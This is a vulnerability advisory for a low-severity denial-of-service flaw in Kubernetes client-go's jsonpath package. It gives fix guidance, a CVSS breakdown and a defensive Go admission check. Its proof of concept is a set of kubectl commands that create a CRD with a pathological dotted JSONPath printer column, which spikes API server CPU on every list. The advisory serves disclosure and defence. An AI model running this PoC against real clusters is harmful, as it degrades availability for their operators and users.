Denial of Service (DoS) Affecting github.com/kubernetes/kubernetes/staging/src/k8s.io/client-go/util/jsonpath package, versions <1.19.0-rc.4


Severity: low (Snyk CVSS 3.1 score 3.5; assessment made by Snyk's Security Team)

Exploit maturity: Proof of concept

  • Snyk ID SNYK-GOLANG-GITHUBCOMKUBERNETESKUBERNETESSTAGINGSRCK8SIOCLIENTGOUTILJSONPATH-597670
  • published 24 Jul 2020
  • disclosed 24 Jul 2020
  • credit lazydog

Introduced: 24 Jul 2020

CVE: not available. CWE: CWE-400 (Uncontrolled Resource Consumption)

How to fix?

Upgrade github.com/kubernetes/kubernetes/staging/src/k8s.io/client-go/util/jsonpath to version 1.19.0-rc.4 or higher.

Overview

github.com/kubernetes/kubernetes/staging/src/k8s.io/client-go/util/jsonpath is a template engine using JSONPath syntax, as described at http://goessner.net/articles/JsonPath/. In addition, it provides a {range} {end} construct to iterate over lists and slices. The Kubernetes API server uses it to evaluate the JSONPath expressions in a CustomResourceDefinition's additionalPrinterColumns when it renders the table view of custom resources.

Affected versions of this package are vulnerable to Denial of Service (DoS). A user with permission to create CRDs can define a printer column whose JSONPath expression is pathological for the parser; every list of the corresponding custom resources (for example, kubectl get) then causes enormous CPU usage on the API server. Creating CRDs is a cluster-scoped privilege, and the cost is only incurred when the resources are listed, which is why the score below is low; the impact is availability only.

PoC

The PoC uses the apiextensions.k8s.io/v1beta1 CRD API, which is served by the affected versions. The pathological value is the JSONPath of the printer column: a long run of dots, not a normal field path.

kubectl create -f - <<EOF
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
  name: foos.example.com
spec:
  group: example.com
  scope: Namespaced
  names:
    plural: foos
    singular: foo
    kind: Foo
  version: v1
  additionalPrinterColumns:
  - name: FOO
    type: string
    JSONPath: ........................................................................................................................................................................................................
EOF
kubectl create -f - <<EOF
apiVersion: example.com/v1
kind: Foo
metadata:
  name: foo-cr
spec:
  foo:
    bar:
      baz:
        qux: data
EOF
kubectl get foo

API server CPU usage increases significantly while the list is served, and it does so again on every subsequent list of the resource.
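The fix is to upgrade. For clusters that cannot upgrade immediately, the following added example (not code from Kubernetes or from this advisory) shows the shape of a validating admission check that rejects CRDs whose printer-column JSONPath expressions look like the PoC: it caps the expression length and the number of consecutive dots. The limits (256 bytes, 2 consecutive dots) are assumptions chosen for illustration; ".." is legitimate JSONPath recursive descent and is allowed. The advisory does not describe the parser's root cause, so this heuristic targets only the PoC's shape and is a stopgap, not a replacement for 1.19.0-rc.4. It parses the CRD in JSON form (kubectl -o json) with only the standard library, handling both v1beta1 (spec.additionalPrinterColumns) and v1 (spec.versions[].additionalPrinterColumns). The sample CRDs are constructed inline.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Hypothetical policy limits (assumptions, not Kubernetes defaults). Long
// expressions and long runs of dots are what the PoC in this advisory uses.
const (
	maxJSONPathLen     = 256
	maxConsecutiveDots = 2 // ".." is JSONPath recursive descent and legitimate
)

// printerColumn covers both apiextensions.k8s.io/v1 ("jsonPath") and v1beta1
// ("JSONPath"): encoding/json matches object keys case-insensitively, so one
// field receives either spelling.
type printerColumn struct {
	Name     string `json:"name"`
	JSONPath string `json:"jsonPath"`
}

// crd holds only the CRD fields this check needs. v1beta1 keeps printer
// columns at spec level; v1 keeps them per version.
type crd struct {
	Metadata struct {
		Name string `json:"name"`
	} `json:"metadata"`
	Spec struct {
		AdditionalPrinterColumns []printerColumn `json:"additionalPrinterColumns"`
		Versions                 []struct {
			Name                     string          `json:"name"`
			AdditionalPrinterColumns []printerColumn `json:"additionalPrinterColumns"`
		} `json:"versions"`
	} `json:"spec"`
}

// JSONPathProblem returns a non-empty reason if the expression trips a limit.
func JSONPathProblem(path string) string {
	if len(path) > maxJSONPathLen {
		return fmt.Sprintf("expression is %d bytes, limit %d", len(path), maxJSONPathLen)
	}
	run, longest := 0, 0
	for _, r := range path {
		if r == '.' {
			run++
			if run > longest {
				longest = run
			}
		} else {
			run = 0
		}
	}
	if longest > maxConsecutiveDots {
		return fmt.Sprintf("%d consecutive dots, limit %d", longest, maxConsecutiveDots)
	}
	return ""
}

// SuspiciousPrinterColumns parses a CRD (JSON form) and returns one finding
// per printer column whose JSONPath trips a limit. An empty result means the
// CRD would be admitted by this check.
func SuspiciousPrinterColumns(crdJSON []byte) ([]string, error) {
	var c crd
	if err := json.Unmarshal(crdJSON, &c); err != nil {
		return nil, err
	}
	var findings []string
	check := func(version string, cols []printerColumn) {
		for _, col := range cols {
			if why := JSONPathProblem(col.JSONPath); why != "" {
				findings = append(findings, fmt.Sprintf("%s %s column %q: %s",
					c.Metadata.Name, version, col.Name, why))
			}
		}
	}
	check("(spec)", c.Spec.AdditionalPrinterColumns)
	for _, v := range c.Spec.Versions {
		check(v.Name, v.AdditionalPrinterColumns)
	}
	return findings, nil
}

// Constructed sample CRDs: the v1beta1 one mirrors the PoC above (200 dots);
// the v1 one uses an ordinary field path and a legitimate ".." descent.
var (
	maliciousCRD = []byte(`{"apiVersion":"apiextensions.k8s.io/v1beta1","kind":"CustomResourceDefinition",
"metadata":{"name":"foos.example.com"},
"spec":{"group":"example.com","version":"v1",
"additionalPrinterColumns":[{"name":"FOO","type":"string","JSONPath":"` + strings.Repeat(".", 200) + `"}]}}`)
	benignCRD = []byte(`{"apiVersion":"apiextensions.k8s.io/v1","kind":"CustomResourceDefinition",
"metadata":{"name":"bars.example.com"},
"spec":{"group":"example.com","versions":[{"name":"v1",
"additionalPrinterColumns":[{"name":"QUX","type":"string","jsonPath":".spec.foo.bar.baz.qux"},
{"name":"ANY","type":"string","jsonPath":"..qux"}]}]}}`)
)

func main() {
	for _, doc := range [][]byte{maliciousCRD, benignCRD} {
		findings, err := SuspiciousPrinterColumns(doc)
		if err != nil {
			fmt.Println("parse error:", err)
			continue
		}
		if len(findings) == 0 {
			fmt.Println("ok: no suspicious printer columns")
		}
		for _, f := range findings {
			fmt.Println("DENY:", f)
		}
	}
}
```

The same function can be run over `kubectl get crd -o json` output to audit CRDs already present in a cluster; in a webhook it would sit behind a CREATE/UPDATE rule on customresourcedefinitions. Keep the limits conservative: a false positive here blocks a CRD author, while a false negative costs the API server.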

CVSS Scores

Snyk recommended score, CVSS version 3.1: 3.5 low
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L
  • Attack Vector (AV): Network
  • Attack Complexity (AC): Low
  • Privileges Required (PR): Low
  • User Interaction (UI): Required
  • Scope (S): Unchanged
  • Confidentiality (C): None
  • Integrity (I): None
  • Availability (A): Low